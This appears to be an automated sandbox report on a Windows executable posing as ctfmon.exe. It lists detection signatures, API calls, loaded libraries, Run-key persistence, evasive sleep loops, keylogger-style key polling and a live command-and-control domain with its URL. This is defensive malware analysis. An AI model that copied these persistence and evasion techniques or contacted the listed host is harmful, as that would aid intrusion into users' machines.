Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ctfmon.exe

Overview

General Information

Sample name:ctfmon.exe
Analysis ID:1581370
MD5:e93fc4c159d07f6bfc246c10e6149ef8
SHA1:5cd471e675ee61296a0aa0ce842835e710025b65
SHA256:184b00a27e5b28089f7061ab3f92d2d4edafae37d33fb9f97af81d3b5cbdb559
Tags:exeuser-windshock
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ctfmon.exe (PID: 2096 cmdline: "C:\Users\user\Desktop\ctfmon.exe" MD5: E93FC4C159D07F6BFC246C10E6149EF8)
  • ctfmon.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\ctfmon.exe" MD5: E93FC4C159D07F6BFC246C10E6149EF8)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\ctfmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ctfmon.exe, ProcessId: 2096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ctfmon.exeVirustotal: Detection: 15%Perma Link
Source: ctfmon.exeReversingLabs: Detection: 34%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: ctfmon.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,0_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,0_2_00405FAB
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,3_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,3_2_00405FAB
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004014B0 VirtualAlloc,VirtualAlloc,WSAStartup,LoadLibraryW,GetProcAddress,FreeLibrary,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateEventW,CreateEventW,SetEvent,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,InternetCloseHandle,InternetOpenA,Sleep,InternetConnectA,InternetCloseHandle,Sleep,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetSetOptionA,Sleep,WaitForSingleObject,ResetEvent,HttpAddRequestHeadersA,HttpSendRequestA,InternetReadFile,GetLastError,SetEvent,0_2_004014B0
Source: global trafficDNS traffic detected: DNS query: mircroupdata.dynamic-dns.net
Source: ctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mircroupdata.dynamic-dns.net/item.asp?spm=xx
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004235E7 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,0_2_004235E7
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00420782 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00420782
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004235E7 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,3_2_004235E7
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00420782 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_00420782
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004229750_2_00422975
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004170320_2_00417032
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041A1000_2_0041A100
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041B3100_2_0041B310
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004135950_2_00413595
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004196B00_2_004196B0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041F7C00_2_0041F7C0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004188E00_2_004188E0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041B8900_2_0041B890
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00419C600_2_00419C60
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041BF100_2_0041BF10
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00401FF00_2_00401FF0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004170323_2_00417032
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041A1003_2_0041A100
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041B3103_2_0041B310
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004135953_2_00413595
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004196B03_2_004196B0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041F7C03_2_0041F7C0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004188E03_2_004188E0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041B8903_2_0041B890
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004229753_2_00422975
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00419C603_2_00419C60
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041BF103_2_0041BF10
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00401FF03_2_00401FF0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: String function: 00424CED appears 46 times
Source: C:\Users\user\Desktop\ctfmon.exeCode function: String function: 004283EE appears 38 times
Source: C:\Users\user\Desktop\ctfmon.exeCode function: String function: 0040D1F7 appears 50 times
Source: C:\Users\user\Desktop\ctfmon.exeCode function: String function: 0040DEC0 appears 254 times
Source: ctfmon.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal52.winEXE@2/0@16/1
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00403A00 EnumProcesses,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,OpenProcess,EnumProcessModules,GetModuleFileNameExW,CloseHandle,Process32NextW,CloseHandle,0_2_00403A00
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0042131A __EH_prolog,FindResourceW,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,0_2_0042131A
Source: ctfmon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ctfmon.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ctfmon.exeVirustotal: Detection: 15%
Source: ctfmon.exeReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\ctfmon.exeFile read: C:\Users\user\Desktop\ctfmon.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ctfmon.exe "C:\Users\user\Desktop\ctfmon.exe"
Source: unknownProcess created: C:\Users\user\Desktop\ctfmon.exe "C:\Users\user\Desktop\ctfmon.exe"
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: oledlg.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: oledlg.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeAutomated click: OK
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004014B0 VirtualAlloc,VirtualAlloc,WSAStartup,LoadLibraryW,GetProcAddress,FreeLibrary,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateEventW,CreateEventW,SetEvent,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,InternetCloseHandle,InternetOpenA,Sleep,InternetConnectA,InternetCloseHandle,Sleep,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetSetOptionA,Sleep,WaitForSingleObject,ResetEvent,HttpAddRequestHeadersA,HttpSendRequestA,InternetReadFile,GetLastError,SetEvent,0_2_004014B0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0040DBE0 push eax; ret 0_2_0040DC0E
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0040DEC0 push eax; ret 0_2_0040DEDE
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0040DBE0 push eax; ret 3_2_0040DC0E
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0040DEC0 push eax; ret 3_2_0040DEDE
Source: C:\Users\user\Desktop\ctfmon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exeJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exeJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exeJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exeJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_004013E0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_004013E0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041D720 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_0041D720
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00405B9B MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,0_2_00405B9B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0041CF70 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_0041CF70
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_004013E0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_004013E0
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041D720 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,3_2_0041D720
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00405B9B MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,3_2_00405B9B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0041CF70 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,3_2_0041CF70
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeCode function: GetAdaptersInfo,GetAdaptersInfo,CreateEventW,0_2_00403550
Source: C:\Users\user\Desktop\ctfmon.exeCode function: GetAdaptersInfo,GetAdaptersInfo,CreateEventW,3_2_00403550
Source: C:\Users\user\Desktop\ctfmon.exeWindow / User API: threadDelayed 1991Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeWindow / User API: threadDelayed 7789Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-19574
Source: C:\Users\user\Desktop\ctfmon.exeAPI coverage: 9.7 %
Source: C:\Users\user\Desktop\ctfmon.exeAPI coverage: 8.9 %
Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052Thread sleep count: 59 > 30Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052Thread sleep time: -7080000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 2820Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960Thread sleep count: 1991 > 30Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960Thread sleep time: -238920000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960Thread sleep count: 7789 > 30Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960Thread sleep time: -934680000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\ctfmon.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,0_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 0_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,0_2_00405FAB
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,3_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exeCode function: 3_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,3_2_00405FAB
Source: C:\Users\user\Desktop\ctfmon.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exeThread delayed: delay time: 120000Jump to behavior
Source: ctfmon.exe, 00000003.00000002.4563354300.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
